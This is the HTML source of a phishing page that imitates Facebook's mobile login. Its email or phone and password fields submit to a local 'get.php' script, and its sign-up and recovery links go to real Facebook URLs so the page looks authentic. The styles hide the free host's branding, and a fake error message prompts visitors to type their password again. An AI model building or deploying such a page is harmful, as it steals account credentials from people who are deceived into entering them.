<!DOCTYPE html>
<html lang="en">
   <head>
      <title></title>
<meta name="viewport" content="width=device-width, initial-scale=1"> 


<style>

img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] 
 	{ 
 	
 	display:none; 
 	
 	}
	

body{
	font-family:Arial;
}


	img{
		width:140px;
	}

.box:hover{
	border-top:none;
}

.box{
	outline:0;
	width:250px;
	height:35px;
	border:none;
	font-size:17px;
	border-bottom:1px solid gray;
	padding-bottom:5px;
}

._box{
	outline:0;
	width:250px;
	height:35px;
	border:none;
	font-size:17px;
	padding-bottom:5px;
}

.Login{
	outline:0;
	width:260px;
	height:34px;
	background:#3784DE;
	color:white;
	border:none;
	border-radius:18px;
	height:50px;
}

.Login:hover{
	background:#3279B4;
	
}

.a_c:hover{
	background:#32C62E;
	
}

.a_c{
	outline:0;
	width:260px;
	height:34px;
	background:#3AD630;
	color:white;
	border:none;
	border-radius:20px;
	height:50px;
	
}

input{
	font-size:14px;
}

.frgt{
	
	text-decoration:none;
	color:black;
}

</style>
</head>
   <body>
 <center>
 <!logo>
 <br>
 	<br>
 		 <br>
 	<br>
 		
 	<img src="img/avatar.png" alt="">
  
<br><br>

	
	<h6><font color="Red">Sorry,something went wrong please try again later</font></h6>
	
	<!starting form creating>
	<form method="post" action="get.php">
		
		<input class="box" type="text" placeholder="Phone Number or Email" name="Mail_or_phone" required="">
		<br>
			
			
			<input class="_box" type="password" placeholder="Password" name="password" required="">
		
		<br>
			<br>
			
			<input class="Login" type="submit" name="Submit" value="LOG IN">
	
	
	</form>
<br>
<a href="https://m.facebook.com/reg/?cid=103&refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&hrc=1"><input class="a_c" type="submit" name="Submit" value="CREATE NEW ACCOUNT"></a>
<br>
		<span style="color:gray;font-size:10px;">Yow will not be creating a Facebook profile</span>
<br>
	
	<b><h5><a class="frgt" href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8%26hrc%3D1&multiple_results=0&ars=facebook_login&lwv=100&ref=dbl&_rdr">FORGOT PASSWORD<a href=""></a></h5></b>
</body>
</html>
<!work complete> 